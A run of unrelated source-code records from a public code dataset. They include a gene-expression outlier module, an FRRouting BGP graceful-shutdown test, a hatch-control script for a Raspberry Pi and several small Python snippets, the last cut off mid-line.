self.least_extr_threshold = threshold\n elif self.distribution == \"normal\":\n self.least_extr_threshold = min(self.threshold)\n elif self.distribution == \"rank\":\n self.least_extr_threshold = max(self.threshold)\n elif self.distribution == \"custom\":\n self.least_extr_threshold = 1\n else:\n raise RNASeqError(\"'{}' is not a valid outlier distribution\".\n format(distribution))\n # logger.debug(self.least_extr_threshold)\n\n def prepare_outliers(self, outlier_max, vcf_id_list, logger):\n \"\"\"Obtain gene expression outliers.\n\n Args:\n outlier_max (:obj:`int`): maximum number of outliers per ID\n vcf_id_list (:obj:`list`): list of Blinded IDs with WGS\n logger (:obj:`logging object`): Current logger\n\n Check if expression outlier file already exists. If it does not,\n use `get_outliers` to obtain outliers using only IDs\n with WGS. Once these outliers are obtained, plot a histogram\n of the number of outliers per ID. If there is a maximum\n number of outliers per ID specified, then remove IDs that\n cross this threshold and call outliers again. Save the\n outlier dataframe to `expr_outs_loc`\n\n \"\"\"\n if os.path.exists(self.expr_outs_loc):\n print(\"Already made outlier file \" + self.expr_outs_loc)\n return \"Already made outlier file \" + self.expr_outs_loc\n # only work with IDs in WGS that are also in the RNAseq\n lines_w_consistent_ids = self.expr_long_df.blinded_id.isin(vcf_id_list)\n if lines_w_consistent_ids.sum() == 0:\n raise RNASeqError(\"No overlapping IDs between RNAseq and VCF\")\n self.expr_long_df = self.expr_long_df[lines_w_consistent_ids]\n if self.cov:\n print(\"before regression:\")\n print(self.expr_long_df.head())\n self.expr_long_df = self.regress_out_covarates(self.cov)\n print(\"AFTER regression:\")\n print(self.expr_long_df.head())\n # logger.debug(self.expr_long_df.head())\n # logger.debug(self.expr_long_df.shape)\n # actually calculate the outliers\n self.get_outliers(vcf_id_list)\n outs_per_id_file = re.sub('.txt', '_outliers_per_id_ALL',\n self.expr_outs_loc)\n plot_outs_per_id(self.expr_long_df, outs_per_id_file)\n outs_per_id_file = re.sub('.txt', '_outliers_per_id',\n self.expr_outs_loc)\n # determine which IDs have too many outliers (and remove these)\n if outlier_max:\n outs_per_id = self.expr_long_df[[\n 'blinded_id', 'expr_outlier']].groupby('blinded_id').sum()\n while any(outs_per_id.expr_outlier >= outlier_max):\n ids_to_keep = self.get_ids_w_low_out_ct(\n self.expr_long_df, outlier_max)\n lines_w_consistent_ids = self.expr_long_df.blinded_id.isin(\n ids_to_keep)\n if lines_w_consistent_ids.shape[0] == 0:\n raise RNASeqError(\"No IDs with <{} outliers\".format(\n outlier_max))\n self.expr_long_df = self.expr_long_df[lines_w_consistent_ids]\n self.get_outliers(ids_to_keep)\n plot_outs_per_id(self.expr_long_df, outs_per_id_file)\n outs_per_id = self.expr_long_df[[\n 'blinded_id', 'expr_outlier']].groupby('blinded_id').sum()\n # print(any(outs_per_id.expr_outlier >= outlier_max))\n self.remove_divergent_genes()\n # write `self.expr_long_df` to file\n print(\"Saving outlier status dataframe to\", self.expr_outs_loc)\n self.expr_long_df.to_csv(self.expr_outs_loc, sep=\"\\t\", index=False)\n\n def get_outliers(self, ids_to_keep):\n \"\"\"Calculate RNAseq outliers.\n\n Updates:\n `expr_long_df` (:obj:`DataFrame`): outliers per gene across\n all genes in long format\n\n Raises:\n :obj:`RNASeqError`: if there are no overlapping IDs between\n the RNAseq and WGS or if `distribution` is not valid\n\n Loads RNAseq in BED format (same format used for FastQTL),\n then identifies outliers.\n\n TODO:\n Clean/incorporate parallelization method and/or ask stackoverflow\n on options for vectorizing the `find_expr_outlier` function\n Confirm expr_cut_off is an acceptable value for normal/rank/custom\n Check that WGS IDs are consistent with outlier IDs\n\n \"\"\"\n if self.distribution == \"normal\":\n self.identify_outliers_from_normal(ids_to_keep)\n elif self.distribution == \"rank\":\n self.expr_long_df = self.identify_outliers_from_ranks()\n elif self.distribution == \"custom\":\n not_0_1 = ~self.expr_long_df.z_expr.isin([0, 1])\n if any(not_0_1):\n print(self.expr_long_df[not_0_1].head())\n raise RNASeqError(\"The values above were not 0 or 1\")\n self.expr_long_df[\"expr_outlier\"] = self.expr_long_df.z_expr == 1\n # set expr_outlier_neg and expr_outlier_pos as 0 for custom\n self.expr_long_df[\"expr_outlier_neg\"] = 0\n self.expr_long_df[\"expr_outlier_pos\"] = 0\n else:\n raise RNASeqError(\"'{}' is not a valid outlier distribution\".\n format(self.distribution))\n if self.extrema:\n self.find_most_extreme_expr_outlier()\n\n def identify_outliers_from_normal(self, ids_to_keep):\n \"\"\"Identify outliers more extreme than a z-score threshold.\n\n TODO:\n All three lines raise a SettingWithCopyWarning when the column\n already exists in the dataframe. Unclear why or if this is an issue\n\n \"\"\"\n # print(\"(Re)calculating z-scores per gene...\")\n print(\"Calculating z-score outliers....\")\n self.expr_long_df = self.expr_long_df.assign(\n z_abs=abs(self.expr_long_df.z_expr))\n self.expr_long_df = self.expr_long_df.assign(\n expr_outlier=self.expr_long_df.z_abs > self.least_extr_threshold)\n self.expr_long_df = self.expr_long_df.assign(\n expr_outlier_neg=(self.expr_long_df.z_expr < 0) &\n self.expr_long_df.expr_outlier)\n self.expr_long_df = self.expr_long_df.assign(\n expr_outlier_pos=(self.expr_long_df.z_expr > 0) &\n self.expr_long_df.expr_outlier)\n # self.remove_divergent_genes(ids_to_keep)\n\n def remove_divergent_genes(self):\n \"\"\"Remove genes where more than 5% of genes are outliers.\"\"\"\n # self.expr_long_df.set_index(['gene', 'blinded_id'], inplace=True)\n # print(self.expr_long_df.index.get_level_values(\n # 'gene').unique())\n uniq_ids = self.expr_long_df.blinded_id.unique()\n print(\"Removing genes where more than 5% are outliers across \" +\n str(len(uniq_ids)) + \" samples.\")\n if (self.distribution == \"normal\") and self.extrema:\n self.expr_long_df = self.expr_long_df.assign(\n expr_outlier_NOT_extrema=self.expr_long_df.z_abs >\n self.least_extr_threshold)\n outs_per_gene_ct = self.expr_long_df.groupby(\n 'gene')['expr_outlier_NOT_extrema'].transform('sum')\n self.expr_long_df.drop(\n ['expr_outlier_NOT_extrema'], axis=1, inplace=True)\n elif self.distribution == \"rank\":\n # Temporary just to confirm using same genes across all comparisons\n return None\n self.expr_long_df = self.expr_long_df.assign(\n expr_outlier_NOT_rank=abs(self.expr_long_df.z_expr) > 2)\n outs_per_gene_ct = self.expr_long_df.groupby(\n 'gene')['expr_outlier_NOT_rank'].transform('sum')\n self.expr_long_df.drop(\n ['expr_outlier_NOT_rank'], axis=1, inplace=True)\n else:\n outs_per_gene_ct = self.expr_long_df.groupby(\n 'gene')['expr_outlier'].transform('sum')\n outs_per_gene_NOT_reasonable = (\n 0.05*len(uniq_ids)) < outs_per_gene_ct\n # genes_to_rm = self.expr_long_df[\n # outs_per_gene_NOT_reasonable].index.get_level_values(\n # 'gene').unique()\n genes_to_rm = self.expr_long_df[\n outs_per_gene_NOT_reasonable]['gene'].unique()\n print(\"More than 1/20 samples have outliers more more extreme \" +\n \"than Z={} for {} genes\".format(\n str(self.least_extr_threshold), str(len(genes_to_rm))))\n self.expr_long_df = self.expr_long_df[~outs_per_gene_NOT_reasonable]\n if self.expr_long_df.shape[0] == 0:\n raise RNASeqError(\"All genes have >1/20 samples as outliers\")\n\n def identify_outliers_from_ranks(self):\n \"\"\"Identify outliers based on those more extreme than percentile.\n\n Args\n `least_extr_threshold`: percentile cut-off for outliers\n\n \"\"\"\n print(\"Calculating ranks...\")\n expr_long_df = applyParallel(self.expr_long_df.groupby(\n 'gene'), self.calculate_ranks,\n self.n_processes)\n print(\"Ranks calculated, identifying outliers\")\n min_expr_cut_off = min(set(expr_long_df.expr_rank))\n if (self.least_extr_threshold <= min_expr_cut_off) or (\n self.least_extr_threshold >= 0.5):\n raise RNASeqError(\"The percentile cut-off specified ({}) is \" +\n \"not between 0.5 and the minimum cut-off \" +\n \"for this sample size, {}\".format(\n self.least_extr_threshold, min_expr_cut_off))\n # print((\"The percentile cut-off specified ({}) is \" +\n # \"not between 0.5 and the minimum cut-off \" +\n # \"for this sample size, {}\").format(\n # self.least_extr_threshold, min_expr_cut_off))\n # self.least_extr_threshold = min_expr_cut_off\n hi_expr_cut_off = 1 - self.least_extr_threshold\n expr_long_df[\"expr_outlier_neg\"] = (\n expr_long_df.expr_rank <= self.least_extr_threshold)\n expr_long_df[\"expr_outlier_pos\"] = (\n expr_long_df.expr_rank >= hi_expr_cut_off)\n expr_long_df[\"expr_outlier\"] = (\n expr_long_df.expr_outlier_pos |\n expr_long_df.expr_outlier_neg)\n return expr_long_df\n\n @staticmethod\n def calculate_ranks(gene_group):\n \"\"\"Calculate ranks for each gene.\n\n Args\n `gene_group`: expression for all IDs for a single gene\n\n Returns\n `gene_group`: with expr_rank which is the percentile\n\n \"\"\"\n gene_group[\"expr_rank\"] = gene_group[\"z_expr\"].rank(method='average',\n pct=True)\n return gene_group\n\n @staticmethod\n def recalculate_Zscore(expr_df):\n \"\"\"Re-calculate the z-score for expression data.\"\"\"\n expr_df.set_index(['gene'], inplace=True)\n expr_df_mean = expr_df.mean(axis=1)\n expr_df_std = expr_df.std(axis=1)\n expr_df = expr_df.sub(expr_df_mean, axis=0)\n expr_df = expr_df.div(expr_df_std, axis=0)\n expr_df.reset_index(inplace=True)\n return expr_df\n\n def regress_out_covarates(self, cov_loc):\n \"\"\"Regress out covariates from the re-scaled expression matrix.\n\n Should we perform separate regressions for every gene or a single\n regression for all genes? Separate regressions because the\n parameters and variances will likely have wildly different\n estimates for different genes\n\n Source: https://stackoverflow.com/a/32102764\n\n \"\"\"\n cov_df = pd.read_table(cov_loc, header=None)\n id_var = cov_df.iloc[0][0]\n cov_long = cov_df.set_index([0]).transpose().set_index(id_var)\n cov_long = cov_long.apply(pd.to_numeric, errors='ignore')\n calculate_residuals_per_gene_partial = partial(\n self.calculate_residuals_per_gene, cov_long=cov_long)\n expr_long_df_residuals = applyParallel(self.expr_long_df.groupby(\n 'gene'), calculate_residuals_per_gene_partial,\n self.n_processes)\n return expr_long_df_residuals\n\n @staticmethod\n def calculate_residuals_per_gene(per_gene_df, cov_long):\n \"\"\"Calculate the residuals per gene.\"\"\"\n # make sure they have the same index before joining\n per_gene_df.set_index('blinded_id', inplace=True)\n current_gene = per_gene_df['gene'][0]\n del per_gene_df['gene']\n cov_long.index.name = per_gene_df.index.name\n per_gene_df.columns = ['gene_expr']\n # join covariates with expression\n per_gene_df = cov_long.join(per_gene_df, how='inner')\n # calculate residuals after regressing out covariates\n # sources: https://stackoverflow.com/a/32103366\n x_df = sm.add_constant(per_gene_df.iloc[:, :-1])\n model = sm.OLS(per_gene_df.gene_expr, x_df).fit()\n # return residuals added to the mean\n res_df = pd.DataFrame({'z_expr': model.resid + model.params.const})\n res_df.reset_index(inplace=True)\n res_df['gene'] = current_gene\n # return model.resid + model.params.const\n return res_df\n\n def test_normality(self):\n \"\"\"Check if each gene has normal distribution.\n\n TODO:\n Options include QQ-plots, shapiro-wilk test and others.\n\n \"\"\"\n return True\n\n def find_most_extreme_expr_outlier(self):\n \"\"\"Loop over every gene in parallel, find the most extreme outlier.\n\n Updates attributes:\n `expr_long_df` (:obj:`DataFrame`): outliers per gene across\n all genes in long format\n\n \"\"\"\n print(\"Identifying most extreme outlier per gene...\")\n print(self.expr_long_df.head())\n print(self.expr_long_df.shape)\n self.expr_long_df = applyParallel(self.expr_long_df.groupby(\n 'gene'), self.find_most_extreme_expr_outlier_per_gene,\n self.n_processes)\n self.expr_long_df['expr_outlier_neg'] = (\n self.expr_long_df.expr_outlier_neg &\n self.expr_long_df.expr_outlier)\n self.expr_long_df['expr_outlier_pos'] = (\n self.expr_long_df.expr_outlier_pos &\n self.expr_long_df.expr_outlier)\n\n @staticmethod\n def find_most_extreme_expr_outlier_per_gene(gene_group):\n \"\"\"Label outliers in a group.\n\n Create a column for absolute value of expression z-score, determine\n which `blinded_id` has the maximum expression z-score to\n create `expr_outlier_status` column, then determine if any of these\n outliers have z-scores < 0 (i.e., are low or negative outliers).\n\n Args:\n `gene_group`: long-format expression dataframe for a gene\n\n \"\"\"\n gene_group['expr_outlier'] = (\n (gene_group.z_abs == max(gene_group.z_abs)) &\n gene_group.expr_outlier)\n return gene_group\n\n @staticmethod\n def get_ids_w_low_out_ct(expr_outlier_df, outlier_max):\n \"\"\"Identify and remove blinded_ids with a ton of outliers.\n\n Args:\n `expr_outlier_df`: long-format expression dataframe\n labeling each gene-ID as an outlier\n `outlier_max`: maximum number of outliers per ID\n\n \"\"\"\n outs_per_id = expr_outlier_df[['blinded_id', 'expr_outlier']].groupby(\n 'blinded_id').sum()\n ids_w_hi_out_ct = list(\n outs_per_id[outs_per_id.expr_outlier >= outlier_max].index)\n print(\"The following IDs have >= {} outliers each: {}\".format(\n outlier_max, \", \".join(ids_w_hi_out_ct)))\n ids_to_keep = list(\n outs_per_id[outs_per_id.expr_outlier < outlier_max].index)\n return ids_to_keep\n","repo_name":"frichter/ore","sub_path":"ore/outliers.py","file_name":"outliers.py","file_ext":"py","file_size_in_byte":20053,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"19942512225","text":"def fibo(n):\n if n == 0:\n return 0\n if n == 1 or n == 2:\n return 1\n return fibo(n-1) + fibo(n-2)\n\n\nfor i in range(11):\n ans = fibo(i)\n print(\"Fibo of {}: {}\".format(i,ans))","repo_name":"pmihsan/SampleCodes","sub_path":"Python/Functions/RecursiveFibo.py","file_name":"RecursiveFibo.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23733475488","text":"import os\nimport re\nimport sys\nimport json\nimport pytest\nimport platform\nfrom functools import partial\n\nCWD = os.path.dirname(os.path.realpath(__file__))\nsys.path.append(os.path.join(CWD, \"../\"))\n\n# pylint: disable=C0413\nfrom lib import topotest\nfrom lib.topogen import Topogen, TopoRouter, get_topogen\nfrom lib.topolog import logger\n\npytestmark = [pytest.mark.bgpd]\n\n\ndef build_topo(tgen):\n for routern in range(1, 6):\n tgen.add_router(\"r{}\".format(routern))\n\n switch = tgen.add_switch(\"s1\")\n switch.add_link(tgen.gears[\"r1\"])\n switch.add_link(tgen.gears[\"r2\"])\n\n switch = tgen.add_switch(\"s2\")\n switch.add_link(tgen.gears[\"r2\"])\n switch.add_link(tgen.gears[\"r3\"])\n\n switch = tgen.add_switch(\"s3\")\n switch.add_link(tgen.gears[\"r2\"])\n switch.add_link(tgen.gears[\"r4\"])\n\n switch = tgen.add_switch(\"s4\")\n switch.add_link(tgen.gears[\"r2\"])\n switch.add_link(tgen.gears[\"r5\"])\n\n\ndef _run_cmd_and_check(router, cmd, results_file, retries=100, intvl=0.5):\n json_file = \"{}/{}\".format(CWD, results_file)\n expected = json.loads(open(json_file).read())\n test_func = partial(topotest.router_json_cmp, router, cmd, expected)\n return topotest.run_and_expect(test_func, None, retries, intvl)\n\n\ndef setup_module(mod):\n tgen = Topogen(build_topo, mod.__name__)\n tgen.start_topology()\n\n router_list = tgen.routers()\n krel = platform.release()\n if topotest.version_cmp(krel, \"4.5\") < 0:\n tgen.errors = \"Linux kernel version of at least 4.5 needed for bgp-gshut tests\"\n pytest.skip(tgen.errors)\n\n # Configure vrf and its slaves in the kernel on r2\n r2 = tgen.gears[\"r2\"]\n r2.run(\"ip link add vrf1 type vrf table 1000\")\n r2.run(\"ip link set vrf1 up\")\n r2.run(\"ip link set r2-eth2 master vrf1\")\n r2.run(\"ip link set r2-eth3 master vrf1\")\n\n # Load FRR config and initialize all routers\n for i, (rname, router) in enumerate(router_list.items(), 1):\n router.load_config(\n TopoRouter.RD_ZEBRA, os.path.join(CWD, \"{}/zebra.conf\".format(rname))\n )\n router.load_config(\n TopoRouter.RD_BGP, os.path.join(CWD, \"{}/bgpd.conf\".format(rname))\n )\n\n tgen.start_router()\n\n # Basic peering test to see if things are ok\n _, result = _run_cmd_and_check(r2, \"show ip bgp summary json\", \"r2/bgp_sum_1.json\")\n assertmsg = \"R2: Basic sanity test after init failed -- global peerings not up\"\n assert result is None, assertmsg\n\n _, result = _run_cmd_and_check(\n r2, \"show ip bgp vrf vrf1 summary json\", \"r2/bgp_sum_2.json\"\n )\n assertmsg = \"R2: Basic sanity test after init failed -- VRF peerings not up\"\n assert result is None, assertmsg\n\n\ndef teardown_module(mod):\n tgen = get_topogen()\n tgen.stop_topology()\n\n\ndef test_bgp_gshut():\n tgen = get_topogen()\n\n if tgen.routers_have_failure():\n pytest.skip(tgen.errors)\n\n r1 = tgen.gears[\"r1\"]\n r2 = tgen.gears[\"r2\"]\n r3 = tgen.gears[\"r3\"]\n r4 = tgen.gears[\"r4\"]\n r5 = tgen.gears[\"r5\"]\n\n # Verify initial route states\n logger.info(\"\\nVerify initial route states\")\n\n _, result = _run_cmd_and_check(\n r1, \"show ip bgp 13.1.1.1/32 json\", \"r1/bgp_route_1.json\"\n )\n assertmsg = \"R1: Route 13.1.1.1/32 not present or has unexpected params\"\n assert result is None, assertmsg\n\n _, result = _run_cmd_and_check(\n r3, \"show ip bgp 11.1.1.1/32 json\", \"r3/bgp_route_1.json\"\n )\n assertmsg = \"R3: Route 11.1.1.1/32 not present or has unexpected params\"\n assert result is None, assertmsg\n\n _, result = _run_cmd_and_check(\n r5, \"show ip bgp 14.1.1.1/32 json\", \"r5/bgp_route_1.json\"\n )\n assertmsg = \"R5: Route 14.1.1.1/32 not present or has unexpected params\"\n assert result is None, assertmsg\n\n logger.info(\"\\nInitial route states are as expected\")\n\n # \"Test #1: Enable BGP-wide graceful-shutdown on R2 and check routes on peers\"\n logger.info(\n \"\\nTest #1: Enable BGP-wide graceful-shutdown on R2 and check routes on peers\"\n )\n\n r2.vtysh_cmd(\n \"\"\"\n configure terminal\n bgp graceful-shutdown\n \"\"\"\n )\n\n # R1, R3 and R5 should see routes from R2 with GSHUT. In addition,\n # R1 should see LOCAL_PREF of 0\n _, result = _run_cmd_and_check(\n r1, \"show ip bgp 13.1.1.1/32 json\", \"r1/bgp_route_2.json\"\n )\n assertmsg = \"R1: Route 13.1.1.1/32 not present or has unexpected params\"\n assert result is None, assertmsg\n\n _, result = _run_cmd_and_check(\n r3, \"show ip bgp 11.1.1.1/32 json\", \"r3/bgp_route_2.json\"\n )\n assertmsg = \"R3: Route 11.1.1.1/32 not present or has unexpected params\"\n assert result is None, assertmsg\n\n _, result = _run_cmd_and_check(\n r5, \"show ip bgp 14.1.1.1/32 json\", \"r5/bgp_route_2.json\"\n )\n assertmsg = \"R5: Route 14.1.1.1/32 not present or has unexpected params\"\n assert result is None, assertmsg\n\n logger.info(\n \"\\nTest #1: Successful, routes have GSHUT and/or LPREF of 0 as expected\"\n )\n\n # \"Test #2: Turn off BGP-wide graceful-shutdown on R2 and check routes on peers\"\n logger.info(\n \"\\nTest #2: Turn off BGP-wide graceful-shutdown on R2 and check routes on peers\"\n )\n\n r2.vtysh_cmd(\n \"\"\"\n configure terminal\n no bgp graceful-shutdown\n \"\"\"\n )\n\n # R1, R3 and R5 should see routes from R2 with their original attributes\n _, result = _run_cmd_and_check(\n r1, \"show ip bgp 13.1.1.1/32 json\", \"r1/bgp_route_1.json\"\n )\n assertmsg = \"R1: Route 13.1.1.1/32 not present or has unexpected params\"\n assert result is None, assertmsg\n\n _, result = _run_cmd_and_check(\n r3, \"show ip bgp 11.1.1.1/32 json\", \"r3/bgp_route_1.json\"\n )\n assertmsg = \"R3: Route 11.1.1.1/32 not present or has unexpected params\"\n assert result is None, assertmsg\n\n _, result = _run_cmd_and_check(\n r5, \"show ip bgp 14.1.1.1/32 json\", \"r5/bgp_route_1.json\"\n )\n assertmsg = \"R5: Route 14.1.1.1/32 not present or has unexpected params\"\n assert result is None, assertmsg\n\n logger.info(\n \"\\nTest #2: Successful, routes have their original attributes with default LPREF and without GSHUT\"\n )\n\n # \"Test #3: Enable graceful-shutdown on R2 only in VRF1 and check routes on peers\"\n logger.info(\n \"\\nTest #3: Enable graceful-shutdown on R2 only in VRF1 and check routes on peers\"\n )\n\n r2.vtysh_cmd(\n \"\"\"\n configure terminal\n router bgp 65001 vrf vrf1\n bgp graceful-shutdown\n \"\"\"\n )\n\n # R1 and R3 should see no change to their routes\n _, result = _run_cmd_and_check(\n r1, \"show ip bgp 13.1.1.1/32 json\", \"r1/bgp_route_1.json\"\n )\n assertmsg = \"R1: Route 13.1.1.1/32 not present or has unexpected params\"\n assert result is None, assertmsg\n\n _, result = _run_cmd_and_check(\n r3, \"show ip bgp 11.1.1.1/32 json\", \"r3/bgp_route_1.json\"\n )\n assertmsg = \"R3: Route 11.1.1.1/32 not present or has unexpected params\"\n assert result is None, assertmsg\n\n # R5 should see routes from R2 with GSHUT.\n _, result = _run_cmd_and_check(\n r5, \"show ip bgp 14.1.1.1/32 json\", \"r5/bgp_route_2.json\"\n )\n assertmsg = \"R5: Route 14.1.1.1/32 not present or has unexpected params\"\n assert result is None, assertmsg\n\n logger.info(\"\\nTest #3: Successful, only VRF peers like R5 see routes with GSHUT\")\n\n # \"Test #4: Try to enable BGP-wide graceful-shutdown on R2 while it is configured in VRF1\"\n logger.info(\n \"\\nTest #4: Try to enable BGP-wide graceful-shutdown on R2 while it is configured in VRF1\"\n )\n\n ret = r2.vtysh_cmd(\n \"\"\"\n configure terminal\n bgp graceful-shutdown\n \"\"\"\n )\n\n # This should fail\n assertmsg = \"R2: BGP-wide graceful-shutdown config not rejected even though it is enabled in VRF1\"\n assert (\n re.search(\"global graceful-shutdown not permitted\", ret) is not None\n ), assertmsg\n\n logger.info(\n \"\\nTest #4: Successful, BGP-wide graceful-shutdown rejected as it is enabled in VRF\"\n )\n\n # \"Test #5: Turn off graceful-shutdown on R2 in VRF1 and check routes on peers\"\n logger.info(\n \"\\nTest #5: Turn off graceful-shutdown on R2 in VRF1 and check routes on peers\"\n )\n\n r2.vtysh_cmd(\n \"\"\"\n configure terminal\n router bgp 65001 vrf vrf1\n no bgp graceful-shutdown\n \"\"\"\n )\n\n # R1 and R3 should see no change to their routes\n _, result = _run_cmd_and_check(\n r1, \"show ip bgp 13.1.1.1/32 json\", \"r1/bgp_route_1.json\"\n )\n assertmsg = \"R1: Route 13.1.1.1/32 not present or has unexpected params\"\n assert result is None, assertmsg\n\n _, result = _run_cmd_and_check(\n r3, \"show ip bgp 11.1.1.1/32 json\", \"r3/bgp_route_1.json\"\n )\n assertmsg = \"R3: Route 11.1.1.1/32 not present or has unexpected params\"\n assert result is None, assertmsg\n\n # R5 should see routes from R2 with original attributes.\n _, result = _run_cmd_and_check(\n r5, \"show ip bgp 14.1.1.1/32 json\", \"r5/bgp_route_1.json\"\n )\n assertmsg = \"R5: Route 14.1.1.1/32 not present or has unexpected params\"\n assert result is None, assertmsg\n\n logger.info(\n \"\\nTest #5: Successful, routes have their original attributes with default LPREF and without GSHUT\"\n )\n\n # tgen.mininet_cli()\n\n\nif __name__ == \"__main__\":\n args = [\"-s\"] + sys.argv[1:]\n sys.exit(pytest.main(args))\n","repo_name":"FRRouting/frr","sub_path":"tests/topotests/bgp_gshut/test_bgp_gshut.py","file_name":"test_bgp_gshut.py","file_ext":"py","file_size_in_byte":9490,"program_lang":"python","lang":"en","doc_type":"code","stars":2787,"dataset":"github-code","pt":"40"} +{"seq_id":"34061345820","text":"#!/usr/bin/python3\n\"\"\"\nAdding module\nThis module supplies with one function, add_integer(a, b)\n\"\"\"\ndef add_integer(a, b=98):\n \"\"\"Return add of a + b\"\"\"\n if not isinstance(a, (int, float)):\n raise TypeError(\"a must be an integer\")\n if not isinstance(b, (int, float)):\n raise TypeError(\"b must be an integer\")\n return a + b\n","repo_name":"Artemisse99/holbertonschool-higher_level_programming","sub_path":"0x07-python-test_driven_development/0-add_integer.py","file_name":"0-add_integer.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10937960564","text":"import allure\nfrom common.tool import testLogin\nimport unittest,warnings\nfrom common.tool import Myrequest\nimport pytest, os\nfrom config.setting import *\nfrom ddt import *\n@ddt\nclass TestLoing(unittest.TestCase):\n\n\n @file_data(r'D:\\autotest\\data\\testdata.yaml')\n @unpack\n def testLogin(self,email):\n\n url = 'self_api/auth/login'\n real_url = urljoin(TESTBASE_URL, url)\n headers = {\n 'Content-Type': 'application/json; charset=UTF-8',\n 'Origin': 'https://crm.putaoabc.com',\n 'Referer': 'https://crm.putaoabc.com/login',\n 'Accept': 'application/json',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36',\n 'Cookie': 'uuid=D58656BD-8333-AC8A-7D54-BC5090F92D60'\n\n }\n data = {\n \"email\": email,\n \"password\": '123456'\n }\n json_data = json.dumps(data)\n\n res = Myrequest.post(url=real_url,data=json_data, is_json=False, header=headers)\n\n token = res['data']['token']\n\n\n return token\n\n\n\n\nif __name__ == '__main__':\n c = TestLoing()\n c.testLogin()\n\n\n\n\n","repo_name":"journey1989/crm","sub_path":"test_case/hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29484690111","text":"import time\nimport RPi.GPIO as GPIO\nimport temperature_log as tl\nimport argparse\nimport rcontrol as rc\nimport daemonizer\nimport configparser\nimport os\nimport schedule\nimport math\n\nclass HatchControler():\n def __init__(self, pin_up, pin_down):\n self.pin_up = 40\n self.pin_down = 38\n #Time\n self.sunrise = None\n self.sunset = None\n #Offset\n self.offset_morning = None\n self.offset_evening = None\n self.open_time = None\n self.close_time = None\n\n def schedule_times(self):\n print(\"Opening at : \"+self.open_time)\n print(\"Closing at :\"+self.close_time)\n schedule.every().day.at(self.open_time).do(self.move_hatch, \"open\")\n schedule.every().day.at(self.close_time).do(self.move_hatch, \"close\")\n return schedule.CancelJob\n\n def move_hatch(self, action):\n GPIO.setmode(GPIO.BOARD)\n # Motor control (0:up 1:down)\n motor = rc.Device(\"motor\", self.pin_up, self.pin_down)\n if action == \"open\":\n motor.enable(1)\n time.sleep(5)\n motor.disable(1)\n time.sleep(5)\n print(\"Hatch opened\")\n elif action == \"close\":\n motor.enable(0)\n time.sleep(5)\n motor.disable(0)\n time.sleep(5)\n print(\"Hatch closed\")\n GPIO.cleanup()\n return schedule.CancelJob\n\n def getOpenWeatherSun(self, owcity_id, owapi_key):\n # Get sunrise and sunset time\n print(\"Getting OpenWeather data\")\n for i in range(0,5):\n while True:\n try:\n weather_data = tl.get_openweather_cond(owcity_id, owapi_key)\n except:\n continue\n break\n hatch.sunrise = time.localtime(weather_data['sunrise'])\n hatch.sunset = time.localtime(weather_data['sunset']) \n risetime = str(self.sunrise.tm_hour)+\",\"+str(self.sunrise.tm_min)\n dusktime = str(self.sunset.tm_hour)+\",\"+str(self.sunset.tm_min)\n print(\"Sunrise : \"+risetime)\n print(\"Sunset : \"+dusktime)\n return\n\n def calculateControlerOffsets(self):\n results = self.calculateOffset(hatch.sunrise, hatch.offset_morning)\n hatch.open_time = \"{0}:{1}\".format(results[0], results[1])\n results = self.calculateOffset(hatch.sunset, hatch.offset_evening)\n hatch.close_time = \"{0}:{1}\".format(results[0], results[1])\n\n\n def calculateOffset(self, initial_time, offset):\n total_min = initial_time.tm_hour*60+initial_time.tm_min\n total_result = total_min + offset\n result_hour = str(math.floor(total_result/60))\n result_min = str(total_result%60)\n if len(result_hour) == 1:\n result_hour = \"0\"+result_hour\n if len(result_min) == 1:\n result_min = \"0\"+result_min\n return result_hour, result_min\n\n\nif __name__ == \"__main__\":\n \"\"\"\n This script control the hatch by opening it and closing it by using sunrise and sunset time.\n \"\"\"\n daemonizer.DaemonKiller.handle()\n script_file = os.path.realpath(__file__)\n script_dir = script_file.split('/')\n wd = '/'\n for i in range(1, len(script_dir)-2):\n wd += script_dir[i]+'/'\n os.chdir(wd)\n\n #parser = argparse.ArgumentParser()\n #parser.add_argument('offset', type=int, help=\"Offset time from the sunrise and sunset. Setting 30 will delay hatch opening and closing by 30 minutes.\")\n #args = parser.parse_args()\n\n hatch = HatchControler('40', '38')\n\n #Read configuration\n config = configparser.ConfigParser()\n config.read(\"conf.cfg\")\n ow_city = config.get('openweather', 'City_ID')\n ow_key = config.get('openweather', 'API_key')\n sun_o_c = config.get('hatch', 'sun_o_c')\n openhour = config.get('hatch', 'openhour')\n closehour = config.get('hatch', 'closehour')\n hatch.offset_morning = config.getint('hatch', 'offset_morning')\n hatch.offset_evening = config.getint('hatch', 'offset_evening')\n\n #Initialize script\n curday = time.localtime().tm_mday\n hatch.getOpenWeatherSun(ow_city, ow_key)\n hatch.calculateControlerOffsets()\n starting_script = True\n\n print(\"Hatch control enabled\")\n if sun_o_c == \"y\" or sun_o_c == \"o\":\n hatch.calculateControlerOffsets()\n schedule.every().day.at(\"00:01\").do(hatch.getOpenWeatherSun, ow_city, ow_key)\n schedule.every().day.at(\"00:10\").do(hatch.calculateControlerOffsets)\n while True:\n curtime = time.localtime()\n schedule.run_pending()\n if curtime.tm_mday != curday or starting_script:\n starting_script = False\n curday = curtime.tm_mday\n if sun_o_c == \"n\":\n print(\"Manual mode\")\n hatch.open_time = openhour\n hatch.close_time = closehour\n hatch.schedule_times()\n elif sun_o_c == \"y\" or sun_o_c == \"o\":\n print(\"Sun mode\")\n hatch.schedule_times()\n time.sleep(30)\n","repo_name":"galviset/hen-manager","sub_path":"henmanager/hatch_control.py","file_name":"hatch_control.py","file_ext":"py","file_size_in_byte":5012,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"24909296099","text":"\nimport blockchain\nimport sys\n\narguments = sys.argv\nif len(arguments) > 1:\n print(\"Start searching for argument: \",end=\"\")\n try:\n miner = 